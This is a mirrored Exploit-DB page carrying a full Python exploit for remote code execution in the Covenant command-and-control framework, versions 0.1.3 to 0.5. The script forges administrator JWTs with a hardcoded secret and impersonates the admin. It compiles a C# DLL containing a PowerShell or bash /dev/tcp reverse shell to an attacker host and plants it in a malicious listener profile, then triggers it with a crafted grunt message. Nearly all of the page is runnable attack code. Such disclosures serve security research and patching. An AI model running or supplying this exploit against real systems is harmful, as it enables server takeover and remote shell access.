Covenant v0.5 – Remote Code Execution (RCE)

  • 作者: xThaz
    日期: 2023-03-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51141/
  • # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
    # Exploit Author: xThaz
    # Author website: https://xthaz.fr/
    # Date: 2022-09-11
    # Vendor Homepage: https://cobbr.io/Covenant.html
    # Software Link: https://github.com/cobbr/Covenant
    # Version: v0.1.3 - v0.5
    # Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker
    
    # Vulnerability
    ## Discoverer: coastal
    ## Date: 2020-07-13
    ## Discoverer website: https://blog.null.farm
    ## References:
    ## - https://blog.null.farm/hunting-the-hunters
    ## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb
    
    # !/usr/bin/env python3
    # encoding: utf-8
    
    
    import jwt# pip3 install PyJWT
    import json
    import warnings
    import base64
    import re
    import random
    import argparse
    
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    from Crypto.Hash import HMAC, SHA256# pip3 install pycryptodome
    from Crypto.Util.Padding import pad
    from Crypto.Cipher import AES
    from requests import request# pip3 install requests
    from subprocess import run
    from pwn import remote, context# pip3 install pwntools
    from os import remove, urandom
    from shutil import which
    from urllib.parse import urlparse
    from pathlib import Path
    from time import time
    
    
    def check_requirements():
    if which("mcs") is None:
    print("Please install the mono framework in order to compile the payload.")
    print("https://www.mono-project.com/download/stable/")
    exit(-1)
    
    
    def random_hex(length):
    alphabet = "0123456789abcdef"
    return ''.join(random.choice(alphabet) for _ in range(length))
    
    
    def request_api(method, token, route, body=""):
    warnings.simplefilter('ignore', InsecureRequestWarning)
    
    return request(
    method,
    f"{args.target}/api/{route}",
    json=body,
    headers={
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
    },
    verify=False
    )
    
    
    def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
    
    payload_data = {
    "sub": username,
    "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
    "User",
    "Administrator"
    ],
    "exp": int(time()) + 360,
    "iss": "Covenant",
    "aud": "Covenant"
    }
    
    token = jwt.encode(payload_data, secret_key, algorithm='HS256')
    return token
    
    
    def get_id_admin(token, json_roles):
    id_admin = ""
    for role in json_roles:
    if role["name"] == "Administrator":
    id_admin = role["id"]
    print(f"\t[*] Found the admin group id : {id_admin}")
    break
    else:
    print("\t[!] Did not found admin group id, quitting !")
    exit(-1)
    
    id_admin_user = ""
    json_users_roles = request_api("get", token, f"users/roles").json()
    for user_role in json_users_roles:
    if user_role["roleId"] == id_admin:
    id_admin_user = user_role["userId"]
    print(f"\t[*] Found the admin user id : {id_admin_user}")
    break
    else:
    print("\t[!] Did not found admin id, quitting !")
    exit(-1)
    
    json_users = request_api("get", token, f"users").json()
    for user in json_users:
    if user["id"] == id_admin_user:
    username_admin = user["userName"]
    print(f"\t[*] Found the admin username : {username_admin}")
    return username_admin, id_admin_user
    else:
    print("\t[!] Did not found admin username, quitting !")
    exit(-1)
    
    
    def compile_payload():
    if args.os == "windows":
    payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
    else:
    payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
    
    dll = """using System;
    using System.Reflection;
    
    namespace ExampleDLL{
    public class Class1{
    public Class1(){
    }
    
    public void Main(string[] args){
    System.Diagnostics.Process.Start(""" + payload + """);
    }
    }
    }
    """
    
    temp_dll_path = f"/tmp/{random_hex(8)}"
    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
    print(f"\t[*] Writing payload in {temp_dll_path}.cs")
    
    compilo_path = which("mcs")
    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
    if compilation.returncode:
    print("\t[!] Error when compiling DLL, quitting !")
    exit(-1)
    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
    
    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
    
    remove(temp_dll_path + ".cs")
    remove(temp_dll_path + ".dll")
    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
    return dll_encoded
    
    
    def generate_wrapper(dll_encoded):
    wrapper = """public static class MessageTransform {
    public static string Transform(byte[] bytes) {
    try {
    string assemblyBase64 = \"""" + dll_encoded + """\";
    var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
    var assembly = System.Reflection.Assembly.Load(assemblyBytes);
    foreach (var type in assembly.GetTypes()) {
    object instance = System.Activator.CreateInstance(type);
    object[] args = new object[] { new string[] { \"\" } };
    try {
    type.GetMethod(\"Main\").Invoke(instance, args);
    }
    catch {}
    }
    }
    catch {}
    return System.Convert.ToBase64String(bytes);
    }
    
    public static byte[] Invert(string str) {
    return System.Convert.FromBase64String(str);
    }
    }"""
    
    return wrapper
    
    
    def upload_profile(token, wrapper):
    body = {
    'httpUrls': [
    '/en-us/index.html',
    '/en-us/docs.html',
    '/en-us/test.html'
    ],
    'httpRequestHeaders': [
    {'name': 'User-Agent',
     'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
    'Safari/537.36'},
    {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
    ],
    'httpResponseHeaders': [
    {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
    ],
    'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
    'httpGetResponse': '{DATA}',
    'httpPostResponse': '{DATA}',
    'id': 0,
    'name': random_hex(8),
    'description': '',
    'type': 'HTTP',
    'messageTransform': wrapper
    }
    
    response = request_api("post", token, "profiles/http", body)
    
    if not response.ok:
    print("\t[!] Failed to create the listener profile, quitting !")
    exit(-1)
    else:
    profile_id = response.json().get('id')
    print(f"\t[*] Profile created with id {profile_id}")
    print("\t[*] Successfully created the listener profile")
    return profile_id
    
    
    def generate_valid_listener_port(impersonate_token, tries=0):
    if tries >= 10:
    print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
    exit(-1)
    
    port = random.randint(8000, 8250)# TO BE EDITED WITH YOUR TARGET LISTENER PORT
    listeners = request_api("get", impersonate_token, "listeners").json()
    
    port_used = []
    for listener in listeners:
    port_used.append(listener["bindPort"])
    
    if port in port_used:
    print(f"\t[!] Port {port} is already taken by another listener, retrying !")
    generate_valid_listener_port(impersonate_token, tries + 1)
    else:
    print(f"\t[*] Port {port} seems free")
    return port
    
    
    def get_id_listener_type(impersonate_token, listener_name):
    response = request_api("get", impersonate_token, "listeners/types")
    if not response.ok:
    print("\t[!] Failed to get the listener type, quitting !")
    exit(-1)
    else:
    for listener_type in response.json():
    if listener_type["name"] == listener_name:
    print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
    return listener_type["id"]
    
    
    def generate_listener(impersonate_token, profile_id):
    listener_port = generate_valid_listener_port(impersonate_token)
    listener_name = random_hex(8)
    data = {
    'useSSL': False,
    'urls': [
    f"http://0.0.0.0:{listener_port}"
    ],
    'id': 0,
    'name': listener_name,
    'bindAddress': "0.0.0.0",
    'bindPort': listener_port,
    'connectAddresses': [
    "0.0.0.0"
    ],
    'connectPort': listener_port,
    'profileId': profile_id,
    'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
    'status': 'Active'
    }
    
    response = request_api("post", impersonate_token, "listeners/http", data)
    
    if not response.ok:
    print("\t[!] Failed to create the listener, quitting !")
    exit(-1)
    else:
    print("\t[*] Successfully created the listener")
    listener_id = response.json().get("id")
    return listener_id, listener_port
    
    
    def create_grunt(impersonate_token, data):
    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
    if stager_code == "":
    stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
    if stager_code == "":
    print("\t[!] Failed to create the grunt payload, quitting !")
    exit(-1)
    
    print("\t[*] Successfully created the grunt payload")
    return stager_code
    
    
    def get_grunt_config(impersonate_token, listener_id):
    data = {
    'id': 0,
    'listenerId': listener_id,
    'implantTemplateId': 1,
    'name': 'Binary',
    'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
    'type': 'binary',
    'dotNetVersion': 'Net35',
    'runtimeIdentifier': 'win_x64',
    'validateCert': True,
    'useCertPinning': True,
    'smbPipeName': 'string',
    'delay': 0,
    'jitterPercent': 0,
    'connectAttempts': 0,
    'launcherString': 'GruntHTTP.exe',
    'outputKind': 'consoleApplication',
    'compressStager': False
    }
    
    stager_code = create_grunt(impersonate_token, data)
    aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
    if not aes_key or not guid_prefix:
    print("\t[!] Failed to retrieve the grunt configuration, quitting !")
    exit(-1)
    
    aes_key = aes_key.group(1)
    guid_prefix = guid_prefix.group(1)
    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
    return aes_key, guid_prefix
    
    
    def aes256_cbc_encrypt(key, message):
    iv_bytes = urandom(16)
    key_decoded = base64.b64decode(key)
    encoded_message = pad(message.encode(), 16)
    
    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
    encrypted = cipher.encrypt(encoded_message)
    
    hmac = HMAC.new(key_decoded, digestmod=SHA256)
    signature = hmac.update(encrypted).digest()
    
    return encrypted, iv_bytes, signature
    
    
    def trigger_exploit(listener_port, aes_key, guid):
    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
    
    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
    data = {
    "GUID": guid,
    "Type": 0,
    "Meta": '',
    "IV": base64.b64encode(iv).decode(),
    "EncryptedMessage": base64.b64encode(ciphered).decode(),
    "HMAC": base64.b64encode(signature).decode()
    }
    
    json_data = json.dumps(data).encode("utf-8")
    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
    
    if send_exploit(listener_port, "Cookie", guid, payload):
    print("\t[*] Exploit succeeded, check listener")
    else :
    print("\t[!] Exploit failed, retrying")
    if send_exploit(listener_port, "Cookies", guid, payload):
    print("\t[*] Exploit succeeded, check listener")
    else:
    print("\t[!] Exploit failed, quitting")
    
    
    def send_exploit(listener_port, header_cookie, guid, payload):
    context.log_level = 'error'
    
    request = f"""POST /en-us/test.html HTTP/1.1\r
    Host: {IP_TARGET}:{listener_port}\r
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
    {header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
    Content-Type: application/x-www-form-urlencoded\r
    Content-Length: {len(payload)}\r
    \r
    {payload}
    """.encode()
    
    sock = remote(IP_TARGET, listener_port)
    sock.sendline(request)
    response = sock.recv().decode()
    sock.close()
    
    if "HTTP/1.1 200 OK" in response:
    return True
    else:
    return False
    
    if __name__ == "__main__":
    check_requirements()
    
    parser = argparse.ArgumentParser()
    parser.add_argument("target",
    help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
    parser.add_argument("os",
    help="Operating System of the target",
    choices=["windows", "linux"])
    parser.add_argument("lhost",
    help="IP of the machine that will receive the reverse shell")
    parser.add_argument("lport",
    help="Port of the machine that will receive the reverse shell")
    args = parser.parse_args()
    
    IP_TARGET = urlparse(args.target).hostname
    
    print("[*] Getting the admin info")
    sacrificial_token = craft_jwt("xThaz")
    roles = request_api("get", sacrificial_token, "roles").json()
    admin_username, admin_id = get_id_admin(sacrificial_token, roles)
    impersonate_token = craft_jwt(admin_username, admin_id)
    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")
    
    print("[*] Generating payload")
    dll_encoded = compile_payload()
    wrapper = generate_wrapper(dll_encoded)
    print("[*] Uploading malicious listener profile")
    profile_id = upload_profile(impersonate_token, wrapper)
    
    print("[*] Generating listener")
    listener_id, listener_port = generate_listener(impersonate_token, profile_id)
    
    print("[*] Triggering the exploit")
    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")